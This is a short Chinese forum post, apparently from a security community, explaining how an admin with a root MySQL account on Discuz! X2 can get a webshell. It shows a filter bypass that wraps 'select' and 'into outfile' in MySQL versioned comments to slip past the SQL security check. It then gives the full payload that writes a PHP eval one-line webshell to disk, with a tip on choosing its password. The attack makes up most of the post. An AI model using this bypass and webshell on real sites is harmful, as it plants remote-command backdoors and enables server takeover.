Discuz X2 后台getshell 鸡肋

2012-12-17 12:46:11 35 4948
作者:yesu
最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell

百度无果,自己本地架设了一下

1,当mysql是root时

站长---数据库---升级

尝试

select '1' into outfile 'E:\2.txt'

会提示

    [Type] 查询语句安全威胁
    [Query] select '1' into outfile 'E:\2.txt'

为什么会这样呢?
\config\config_global.php中
限制了into outfile函数


尝试绕过

/*!select*/ '1' /*!into outfile*/ 'E:\3.txt'


Discuz! 数据结构升级成功,影响的记录行数 1


如果要导出一句话,即

/*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php'


注意:一句话密码不要有引号

关于作者

y35u166篇文章1147篇回复

wechat:13045558888

评论35次

要评论?请先  登录  或  注册